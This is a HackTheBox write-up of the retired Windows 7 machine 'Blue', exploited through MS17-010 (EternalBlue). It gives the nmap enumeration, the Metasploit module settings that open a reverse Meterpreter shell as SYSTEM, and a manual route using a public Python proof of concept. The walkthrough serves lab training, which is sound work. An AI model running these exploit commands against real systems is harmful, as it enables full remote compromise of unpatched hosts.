← write-ups
HackTheBoxEasy2024-04-02

Blue

Retired Windows machine vulnerable to EternalBlue — the NSA-leaked exploit that powered WannaCry. Textbook SMB exploitation.

eternalbluems17-010smbwindowscve-2017-0144

Overview

Blue is a Windows 7 machine exploitable via MS17-010 (EternalBlue), the same vulnerability behind WannaCry and NotPetya. Direct path to SYSTEM — no privesc required.

Enumeration

nmap -sC -sV -p- --min-rate 5000 10.10.10.40
135/tcp  open  msrpc        Microsoft Windows RPC
139/tcp  open  netbios-ssn  Microsoft Windows netbios-ssn
445/tcp  open  microsoft-ds Windows 7 Professional 7601 SP1

Check for MS17-010 explicitly:

nmap --script smb-vuln-ms17-010 -p 445 10.10.10.40
| smb-vuln-ms17-010:
|   VULNERABLE:
|   Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)
|     State: VULNERABLE
|     IDs:  CVE:CVE-2017-0144

Confirmed vulnerable.

Exploitation

msfconsole -q
use exploit/windows/smb/ms17_010_eternalblue
set RHOSTS 10.10.10.40
set LHOST 10.10.14.5
run
[*] Meterpreter session 1 opened
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM

Immediate SYSTEM — grab both flags from here.

Manual path (without Metasploit)

Using the Python PoC from the worawit repo:

git clone https://github.com/worawit/MS17-010
python checker.py 10.10.10.40
python zzz_exploit.py 10.10.10.40

The zzz_exploit.py sends a crafted SMBv1 transaction to trigger the buffer overflow in srv.sys, then shellcode runs in kernel context.

Notes

  • SMBv1 must be enabled for this to work — Windows 7 has it on by default.
  • The overflow happens in the SrvOs2FeaListSizeToNt function — incorrect size calculation leads to a pool overflow.
  • EternalBlue was developed by the NSA, leaked by Shadow Brokers in April 2017, and weaponized within weeks.